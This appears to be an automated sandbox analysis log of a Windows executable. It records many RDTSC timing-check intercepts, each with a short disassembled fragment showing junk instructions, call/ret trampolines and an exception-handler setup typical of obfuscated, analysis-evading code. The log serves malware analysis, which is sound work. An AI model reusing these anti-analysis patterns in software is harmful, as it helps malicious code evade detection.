Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A0A9 second address: 99A0AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A0AD second address: 99A0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F8A2C7FDC16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A611 second address: 99A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F8A2C4FB296h 0x0000000f jmp 00007F8A2C4FB2A5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C702 second address: 99C724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8A2C7FDC1Bh 0x00000010 mov eax, dword ptr [eax] 0x00000012 jp 00007F8A2C7FDC24h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C76F second address: 99C7AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A2C4FB29Eh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push edi 0x00000010 mov edx, dword ptr [ebp+122D28BCh] 0x00000016 pop edx 0x00000017 mov cx, 5100h 0x0000001b push 00000000h 0x0000001d add dword ptr [ebp+122D1CF6h], edx 0x00000023 call 00007F8A2C4FB299h 0x00000028 jns 00007F8A2C4FB2A0h 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 pop edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C8AE second address: 99C8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C8B6 second address: 99C8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB08 second address: 99CB23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F8A2C7FDC1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB23 second address: 99CB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F8A2C4FB296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB34 second address: 99CB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB39 second address: 99CC03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2C4FB29Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e clc 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 mov esi, dword ptr [ebp+122D2738h] 0x00000018 pop ecx 0x00000019 push 951CAE02h 0x0000001e jng 00007F8A2C4FB2A2h 0x00000024 jnp 00007F8A2C4FB29Ch 0x0000002a je 00007F8A2C4FB296h 0x00000030 add dword ptr [esp], 6AE3527Eh 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F8A2C4FB298h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 jmp 00007F8A2C4FB2A8h 0x00000056 push 00000003h 0x00000058 mov si, cx 0x0000005b push 00000000h 0x0000005d je 00007F8A2C4FB29Ch 0x00000063 sub dword ptr [ebp+122D1CA0h], ebx 0x00000069 push 00000003h 0x0000006b sbb si, 2444h 0x00000070 call 00007F8A2C4FB299h 0x00000075 push ebx 0x00000076 jo 00007F8A2C4FB2A7h 0x0000007c jmp 00007F8A2C4FB2A1h 0x00000081 pop ebx 0x00000082 push eax 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F8A2C4FB2A2h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CC03 second address: 99CC10 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CC10 second address: 99CC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CC1E second address: 99CC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 jnp 00007F8A2C7FDC1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CC2F second address: 99CC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 js 00007F8A2C4FB2A4h 0x0000000f pop eax 0x00000010 mov dword ptr [ebp+122D1DB9h], esi 0x00000016 lea ebx, dword ptr [ebp+1244A61Ah] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F8A2C4FB298h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 stc 0x00000037 xchg eax, ebx 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CC81 second address: 99CC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF381 second address: 9AF393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA61 second address: 9BBA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA68 second address: 9BBA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBE79 second address: 9BBE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BC6A3 second address: 9BC6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BC912 second address: 9BC92E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8A2C7FDC27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCA9D second address: 9BCAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCAA3 second address: 9BCAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0965 second address: 9B096D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B096D second address: 9B0980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC1Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0980 second address: 9B0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0984 second address: 9B098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993358 second address: 993370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993370 second address: 993375 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC3F second address: 9BCC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F8A2C4FB296h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC4C second address: 9BCC50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1B6 second address: 9BD1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1BA second address: 9BD1CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F8A2C7FDC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1CA second address: 9BD1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1D0 second address: 9BD1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1D6 second address: 9BD1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD604 second address: 9BD608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD608 second address: 9BD616 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8A2C4FB29Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD616 second address: 9BD61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD61A second address: 9BD647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2C4FB2A5h 0x00000008 jp 00007F8A2C4FB296h 0x0000000e jmp 00007F8A2C4FB29Ah 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD647 second address: 9BD65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD65B second address: 9BD685 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8A2C4FB2A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F8A2C4FB296h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD685 second address: 9BD6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F8A2C7FDC16h 0x00000012 js 00007F8A2C7FDC16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD93C second address: 9BD940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD940 second address: 9BD946 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD946 second address: 9BD94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD94C second address: 9BD969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8A2C7FDC1Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e je 00007F8A2C7FDC16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D25 second address: 9C3D3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2C4FB29Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D3D second address: 9C3D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D41 second address: 9C3D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D47 second address: 9C3D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F8A2C7FDC22h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jl 00007F8A2C7FDC20h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDC6F second address: 9CDCAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F8A2C4FB2A7h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F8A2C4FB298h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDD5F second address: 9CDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDD63 second address: 9CDD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDEA1 second address: 9CDEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE207 second address: 9CE20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE20B second address: 9CE20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED56 second address: 9CED63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED63 second address: 9CED6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE48 second address: 9CEE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE64 second address: 9CEE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF477 second address: 9CF47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF47B second address: 9CF485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF485 second address: 9CF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFC9A second address: 9CFC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFC9E second address: 9CFCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2242 second address: 9D2248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFCA4 second address: 9CFCAE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8A2C4FB29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2248 second address: 9D224E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8660 second address: 9D86F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8A2C4FB296h 0x00000009 jne 00007F8A2C4FB296h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F8A2C4FB298h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1E97h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F8A2C4FB298h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 jmp 00007F8A2C4FB2A5h 0x00000056 mov edi, dword ptr [ebp+122D29A8h] 0x0000005c push 00000000h 0x0000005e mov ebx, dword ptr [ebp+122D1DE5h] 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F8A2C4FB29Ch 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D86F1 second address: 9D8701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D95F1 second address: 9D95F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D95F5 second address: 9D95F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3E32 second address: 9D3E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D95F9 second address: 9D9634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e movsx edi, di 0x00000011 push 00000000h 0x00000013 add dword ptr [ebp+122D2DB3h], ecx 0x00000019 push 00000000h 0x0000001b mov ebx, dword ptr [ebp+124743A3h] 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F8A2C7FDC20h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push edi 0x0000002f pop edi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3E36 second address: 9D3E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3E4F second address: 9D3E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA52C second address: 9DA536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8A2C4FB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA69A second address: 9DA69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB5DE second address: 9DB5E8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8A2C4FB29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC46B second address: 9DC485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA69E second address: 9DA702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+1244513Fh], esi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D2197h], edx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 jc 00007F8A2C4FB29Ch 0x0000002a mov dword ptr [ebp+122D2D52h], eax 0x00000030 cmc 0x00000031 mov eax, dword ptr [ebp+122D1345h] 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F8A2C4FB298h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 adc di, 88FEh 0x00000056 push FFFFFFFFh 0x00000058 adc bx, 6CA4h 0x0000005d push eax 0x0000005e pushad 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE54E second address: 9DE553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE553 second address: 9DE559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE559 second address: 9DE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8A2C7FDC26h 0x0000000d nop 0x0000000e add dword ptr [ebp+122D2E9Bh], ecx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F8A2C7FDC18h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F8A2C7FDC18h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c xor bx, 8B31h 0x00000051 push eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jg 00007F8A2C7FDC16h 0x0000005b rdtsc
